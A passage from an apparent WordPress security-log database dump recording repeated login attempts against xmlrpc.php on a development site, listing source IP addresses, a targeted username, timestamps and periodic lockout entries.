dev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679762605.3998,152,'ct3Pm8dLWgliCFkDZoTXBb2N','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679762614.3564,152,'lzBXaf4bH6pLUT5r7OWEyY32','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679762622.8811,152,'KbQ3cnZiLxOwYDMr2pHeoV1P','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'',0,1679762622.8833,10,'KbQ3cnZiLxOwYDMr2pHeoV1P','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('185.243.11.71',3119713095,'techspt',0,1679767008.2692,152,'YMnFjCcglSeV2H3rEiRTvGDA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.0.232.117',2717968501,'techspt',0,1679767012.5186,152,'YqjLNBpFPm6C2deO9zEgIkKt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.69.187.24',3276127000,'techspt',0,1679767023.6690,152,'1SECdTigkhPR360Qmob95GrU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.85.137',1386567049,'techspt',0,1679767029.0016,152,'oSbhe5D4cWImdJMxvNEBGYZi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('49.234.23.207',837425103,'techspt',0,1679767031.8851,152,'NlpMjcedHA8O6nuZvCI41Eak','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.34',3115726882,'techspt',0,1679767040.3834,152,'JoZsLbFOxIXjn8K315GgAmVc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679767054.5795,152,'TgoHEVle7J9FWSOP1LsfZnmp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679767056.5959,152,'znOagvCmMkJRbGX8f4UKi1pN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.193.183',1152565687,'techspt',0,1679771327.0788,152,'lnMF1iDhLZozRV3djHaPAJO5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.3.246.205',1728313037,'techspt',0,1679771334.1630,152,'mecXWUdQLBy9PRgCDq13hHVJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679771334.3063,152,'S7Wdj5a4Bz8c6krfv2OXFH0J','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.193.183',1152565687,'techspt',0,1679771341.3832,152,'YapCR2xwvL7szcg9lur4EiAP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.193.183',1152565687,'',0,1679771341.3854,10,'YapCR2xwvL7szcg9lur4EiAP','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('37.97.170.79',627157583,'techspt',0,1679771355.7009,152,'MdR5jVs1gmUvtQPKZawWe7C6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679771359.7028,152,'6QDUyH0gfIhea1Pn5rcbFViN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679771359.8783,152,'yKo6138NsmOk9IvBYDVSHnPt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.226.45',3326599725,'techspt',0,1679771362.1758,152,'mrf7WDc6TYeglEZaOGCh0nQs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.43.117.43',2720757035,'techspt',0,1679775760.7715,152,'oOKXdZ7lp4iEPvq8e5Qarnmu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.172',3393054892,'techspt',0,1679775777.4671,152,'vd8ntaOVYoXgKZiDW9jypRFQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.202',1255160778,'techspt',0,1679775783.1416,152,'7t0d8fbNT5vxjwPQMeKcFk6R','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679775790.9999,152,'Bim59dkXEU4w2LqztgpvZMDO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.146',1152553362,'techspt',0,1679775796.4280,152,'3gO6YGCjIH5e7bDBNq0fvdTE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1679775810.8258,152,'HSVfIJpR7GhsAKXWB1Zx5bCg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.47.143',2947690383,'techspt',0,1679776427.1244,152,'syoTz9LZ8r4cFJX5kg01fihR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.0.232.117',2717968501,'techspt',0,1679776429.0001,152,'eokEcnhvW2Vw4u3JPGiRQLrf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679780117.7605,152,'KpTYIBF3sumyoUw6GQinNPAj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.68.11.207',860097487,'techspt',0,1679780118.0544,152,'kOx98gNlLryupa0RSUnKbcDh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679780124.5434,152,'ELN4zTOWRKuqIDYeagxpM9v2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'',0,1679780124.5454,10,'ELN4zTOWRKuqIDYeagxpM9v2','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('1.117.83.240',24466416,'techspt',0,1679780129.2970,152,'jAUW6emcfPM28nQClYtakgBi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.244.46',1152578606,'techspt',0,1679780141.7946,152,'rADLMJjzvkg21fm39YbxPKsQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.38.86.87',3324401239,'techspt',0,1679780143.5017,152,'husveLOHNSMq2WGXFnxZb9w6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('108.170.11.130',1823083394,'techspt',0,1679780156.9611,152,'msUTKpQDkEnJNAhXw2fluBe1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679780161.4535,152,'MwmWOcjBs7ZUu4S62ketVg0J','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679784642.1233,152,'fYx2pkvZa4KI1bLBSdel7Djg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('136.243.219.190',2297682878,'techspt',0,1679784642.3771,152,'v9xrZqe2ahf1OFHTKsXw5UI6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('97.107.133.132',1634436484,'techspt',0,1679785163.4433,152,'msQnEKAXCfFV6IYxRJOrwc0p','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.201.52.205',1539912909,'techspt',0,1679785168.1745,152,'9qK6dBEbkCoWwjz7J3AO5SpF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679785168.7396,152,'EYySGnrk0Mue1cBxtLUIfw4m','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679785172.2285,152,'fSzixBgydmC9qsh78uQUHAE6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'',0,1679785172.2329,10,'fSzixBgydmC9qsh78uQUHAE6','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('185.182.56.34',3115726882,'techspt',0,1679785174.0356,152,'GsuRhvIlkerO0Sq2ygD8NCpT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'techspt',0,1679785180.1238,152,'GzZ0hBOVr29t3YQTol7dRg8x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1679789203.8406,152,'dVmJQk08RhKz3feaYMr1Uigv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.155',1255160731,'techspt',0,1679789204.5593,152,'pRa0O9JDhbcZHFsmPnCXgUi1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679789204.7809,152,'o9PzRqax0pefjsBclQ8grKCw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.226.45',3326599725,'techspt',0,1679789210.1196,152,'2FqDECxH5jQ96yRdhoWtc1nY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679789212.1521,152,'dE7wHRy1JML4YFqc9DfubITx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'techspt',0,1679789232.6688,152,'Rq7QTAtlHUu19YNkawmey3bG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679789235.6660,152,'eb3Mf4DTmSstx0vJECpYQ9nK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679789243.0125,152,'xMb4TqmQ26t0wyzPKNrRF8D3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('31.177.95.88',531717976,'techspt',0,1679789248.6290,152,'3pKQgzXMiWHRhEPtNeGjZ9mT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('69.174.53.190',1169044926,'techspt',0,1679789255.3106,152,'PVkYlifDheSJXjC6AnZv47dp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.77',1152553293,'techspt',0,1679792210.1400,152,'tQabHR94ue3JWIBA2s8ScyoN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.68.230.210',860153554,'techspt',0,1679792210.8082,152,'FZha1JL2KYwPQk709IWgfleM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.169.144.135',1370067079,'techspt',0,1679792215.5015,152,'kDiKLeZ2U0fYrzvmanBJP3uN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679792222.6784,152,'MA3UJ690IVYWzDxFcgfZXsvm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679792234.6936,152,'NBdZMvpwgGCsLHQ91jO0b8zo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.202',1255160778,'techspt',0,1679792246.5547,152,'l90cUOIDTGbmxCAyXQqLo2NS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('49.235.183.178',837531570,'techspt',0,1679792246.7511,152,'hj3wgdcGp1YCQOVSoHPLa7AD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679792253.5861,152,'PpLzUtQsjW3yqaJkD5oEY9nX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'techspt',0,1679792270.9895,152,'kYmiOXn9N4tsEjzbUpov80If','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('23.96.15.22',392171286,'techspt',0,1679794295.6914,152,'pEmZKNAeiuPC0n7lSozsJLWk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'techspt',0,1679797492.4970,152,'iumkcTr1XDPwhUQvqnaIKzCE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679797492.9447,152,'eu9NEh5dBYXc0CJDra8lULA4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('23.96.15.22',392171286,'techspt',0,1679797494.2936,152,'hPZxlTNbci659KFMejkVsQ8a','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679797497.4537,152,'mDaFQM7vjqt0o5Wr4ZJ6VlEn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679797503.9073,152,'VRxiP5XDwOAUyFHr7zmKBqTM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'',0,1679797503.9122,10,'VRxiP5XDwOAUyFHr7zmKBqTM','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('184.168.99.50',3098043186,'techspt',0,1679797505.3811,152,'YVZco0A3N9Dn1HpOByLfa7KR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'',0,1679797505.3844,10,'YVZco0A3N9Dn1HpOByLfa7KR','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.253.54.78',2734503502,'techspt',0,1679797526.0903,152,'Sjnh7VJ4LQOUYk93fX5cwsR6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('97.74.229.3',1632298243,'techspt',0,1679801683.6365,152,'BA7nzjpwscDWXU4RSlaCfT8K','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.172',3393054892,'techspt',0,1679801685.3535,152,'1VJlcE7XYujGzZKpnaNq4sbh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679801694.5498,152,'hfFABirSo4pUn7vjd2mH3uDc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679801698.1943,152,'JuZze924BC7oNKmxA5achrM8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.220.206',2917653710,'techspt',0,1679801705.7935,152,'NiEYAoK90Q61pRImDSwBLghX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.107.213.64',3110851904,'techspt',0,1679801707.2823,152,'8650D3KxniAgJ4dQhOmcaZkH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.52',2487806004,'techspt',0,1679801715.2096,152,'01K2pCachgI97ortSAGBUqb4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'techspt',0,1679801719.8564,152,'oZ2cVaNpCF4OMrjTxt8lJbW3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.211.244.49',1540617265,'techspt',0,1679801727.0991,152,'o7XRV5LIAs4tCpdv8kuEWQT0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.65.123.34',1145142050,'techspt',0,1679806009.7664,152,'MjYfuJvpyhc0rnW8IwVZ14oR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.124.84.123',763122811,'techspt',0,1679806010.0768,152,'sg108wBRcxhCe2nP73GHlSrI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679806018.1178,152,'jwXNeCFUEKoG4IOn2v86a0yl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'techspt',0,1679806024.7710,152,'zEBftdH5GQy4CYbDpITX7MaS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679806030.0116,152,'kc4dCiF7YhySVO3jqgfzMnLQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.102.44',3098043948,'techspt',0,1679806038.5320,152,'QspFxaEBAb8JUy7DiN4W5zqV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('69.174.53.190',1169044926,'techspt',0,1679806040.0010,152,'dUJxXt3TDIAqaVS7fueRokYG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.44.108',1336552556,'techspt',0,1679806051.7378,152,'KuGCc5J1aDByLV4StlHsXqNF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'techspt',0,1679806059.3116,152,'sv3AWEKzolq9GTktdZi8wxQM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.86.170',1386567338,'techspt',0,1679810251.8705,152,'HJCtrcgdAeY9LKD213RlWBxG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679810252.7442,152,'TOMtGxUJX1LPgSf2vuAhE06s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679810254.7817,152,'VvXwLK9FxUhbZ87EekWHsRgJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.188',3115727036,'techspt',0,1679810260.2819,152,'pgJWIEnitHdC59uXLYPU6aZQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'techspt',0,1679810267.2240,152,'5gHdIrpmqn8vOTaMLh9NQCiE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.105.179',1496213939,'techspt',0,1679810271.3130,152,'q2fUD5ewEkxchrJZvWPA3YH9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'techspt',0,1679810283.6388,152,'ZUL12ORciTnpxsW7yelmfdMr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679810288.7063,152,'RpNwD9g4xokv3r7T5AtW0esy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679810299.2188,152,'ZfP17ptIDTHeg9VCGdJU5SvK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679813038.7401,152,'lbuN1vj8fpZ4Y7iVLcMCJBeQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.231.8',3326600968,'techspt',0,1679813038.7410,152,'i1tIB6CQ7MN0DaXr2ekxEGRL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.14.102.253',2718852861,'techspt',0,1679813042.1795,152,'GLJbnu8QCHvhVM93aP6YSo2A','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.172',3393054892,'techspt',0,1679813045.6704,152,'A0fr38jO6x2cwLUdoYh7PFR4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('108.170.11.130',1823083394,'techspt',0,1679813046.1801,152,'nhmAJ1LNV9CvZ0dxMcGSHPQU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('97.74.229.3',1632298243,'techspt',0,1679813052.6420,152,'ekxvHRF5GZWnogLjVrXBmpT4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679813055.9331,152,'BfmtdQRDWXgc9kUeliuvojz7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679813062.9678,152,'IwTBv4s9FhK3XN1c7i5qaLYW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'',0,1679813062.9708,10,'IwTBv4s9FhK3XN1c7i5qaLYW','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('51.68.230.210',860153554,'techspt',0,1679813063.2073,152,'yCAnTuBv97ebsWcjo12FkPQz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679813073.7686,152,'Ke3hwotcEm8kjXYy0lpCJsr7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.7.190.240',2634530544,'techspt',0,1679813076.1435,152,'FmlnMQOfwXu8g4ESv51Dkjyq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.137.65.179',1334395315,'techspt',0,1679813082.2486,152,'qQhO7N3nGCy4KWStgawDsJM2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679813083.3818,152,'0yWgF1JIKT589vj4Gb36XRn2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.113.235.169',3262245801,'',0,1679818894.6022,55,'nJ5vgieqG73KA8BVPUyFc6Cf','','19|0|0|0|cmdev-site1.com/0.php',0,19,0),('5.189.162.27',96313883,'techspt',0,1679819434.7896,152,'NqzmDgWJ6bASFGfuQl3He8ic','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.80.126',1386565758,'techspt',0,1679819436.8805,152,'TJwnDfjIUltzdF2Z5NKs4pkG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'techspt',0,1679819446.7525,152,'38VQmbXheNaq2yt16LnMUBPi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('97.107.133.132',1634436484,'techspt',0,1679819446.8609,152,'lyZCgFHjWks1AfDUVcSRxNTE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('2.58.82.244',37376756,'techspt',0,1679819447.7407,152,'E14TDyxVo9dahJ3XLlCSwiH5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679819454.1746,152,'ftFsbl51KqR8U6kIDjZr4WzO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'',0,1679819454.1768,10,'ftFsbl51KqR8U6kIDjZr4WzO','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('63.250.38.213',1073358549,'techspt',0,1679819456.4394,152,'SUW9KzA4M5Bf3NIgumGEYhPO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'techspt',0,1679819461.9624,152,'9QcSjLXMdEZwua8ICirmWvgk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.128.80',2487386192,'techspt',0,1679819462.2146,152,'V2cm9EXBGuZ5pnLirtxhgCOl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.252',1255160828,'techspt',0,1679819975.8388,152,'6LUqo9JzTBXnRvgHp0dmGYQt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'techspt',0,1679819980.5970,152,'RowPSh3mHTKZWkIDc0yrunil','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'',0,1679819980.6006,10,'RowPSh3mHTKZWkIDc0yrunil','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('198.71.230.31',3326600735,'techspt',0,1679823565.9274,152,'JbflnDBPyFKNgq8EXtoWa3Sm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679823566.6827,152,'k4ztEbUjC6M53GQmZr1YDIf8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'techspt',0,1679823567.2918,152,'IWmAcx0tXNjQwfZkygr6S3zR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.97.231',3098042855,'techspt',0,1679823571.1269,152,'9LI2S4myGCcXREwPpvKtHdsr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.202',1255160778,'techspt',0,1679823577.7890,152,'G26joVJBAhwL8Q41RmiHcXFb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679823579.3320,152,'EsFtunNcbMk0YfHo1qOQZ4X7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.34',3115726882,'techspt',0,1679823581.3505,152,'n7oblPHNfhTVRDMFWkCB8d5X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679823588.2895,152,'TQZ6UacVroJXd5PjF2S9iD0C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'techspt',0,1679823589.1747,152,'XzvqAwecy1ONSsp4Zluxr5FI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.163.160.40',3265503272,'techspt',0,1679823593.6317,152,'YvRtAWMCi1LxJldh7K6V8faX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.77.163.64',860726080,'techspt',0,1679823604.5038,152,'ilsty5HGNYgApu60xRzFUZCO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('96.231.235.203',1625811915,'techspt',0,1679823611.3286,152,'pcjqD4K63MSkZmewrXLbax98','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.171.24.51',3114997811,'techspt',0,1679828277.2971,152,'lhU1r5H2GQ8k6nqXAWFzPMZY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.245.192.133',2650128517,'techspt',0,1679828283.4637,152,'Z3jYuNcnOLqiGXV56dF1t8SH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679828289.0633,152,'ipWxA40clgvfo6mOwE5sVUT8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679828298.3528,152,'P6o8dzn3Lwq7pKCeihjT0a9y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.109.194',1496214978,'techspt',0,1679828303.5239,152,'FonzrxdACiaycpYfP8Dm50VS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679828304.5879,152,'D6WaCbIOJz8sFdg3Bm9ipUwq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.71.226.185',2806506169,'techspt',0,1679828308.7442,152,'tyWO6UJCfe15PIXmRbS0YvBK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679828315.7849,152,'821rdZDacJeUiYBOGpWRKLIb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'',0,1679828315.7872,10,'821rdZDacJeUiYBOGpWRKLIb','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('194.243.52.182',3270718646,'techspt',0,1679831153.8989,152,'XJ0IvMcTHfKhEL4yza2VmYPl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.97.231',3098042855,'techspt',0,1679831159.0171,152,'vR8tYoHT5euiKCO0DpxPr1wa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'',0,1679831166.4682,71,'DQgu18RXOtHlUbGw4mAVFL9B','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('165.22.211.204',2769736652,'techspt',0,1679831167.0866,152,'vA9j5tKZgb2H6S01ixREdu7G','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.138.189.25',3230317849,'techspt',0,1679831177.2564,152,'6MmJtrv5YTEGQC8BL42SfViU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.34',3115726882,'techspt',0,1679831178.4914,152,'0tIZWwl3hCaS81zb4NJpcBUn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.230.31',3326600735,'techspt',0,1679831183.1206,152,'9RrTtJedABvYQxnFyuoLG32W','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('216.250.113.146',3640291730,'techspt',0,1679831186.7514,152,'wrIpEz5vY9jqb2WoBAsZ4MFh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('188.68.47.144',3158585232,'techspt',0,1679831192.7630,152,'zlfI9EStvQanxNM27WKyRqOr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679831193.0744,152,'MBSAFpfdTunWrGevUiIHD6w9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679831195.3040,152,'j0VSsT6te5BFdQcoPHZua4xb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'',0,1679831195.3067,10,'j0VSsT6te5BFdQcoPHZua4xb','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('92.223.85.228',1558140388,'melissa',0,1679835748.6322,152,'Eak2ZVzlYXty70WQpGD8IMRm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.223.85.228',1558140388,'techspt',0,1679835752.1755,152,'zbHs41jGTfuwoehQDBIv6CdN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.223.85.228',1558140388,'',0,1679835752.1796,10,'zbHs41jGTfuwoehQDBIv6CdN','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('96.231.235.203',1625811915,'techspt',0,1679837907.8368,152,'3LTmkSec0KHaIwjiz75Pb9WD','','0|0|0|0|cmde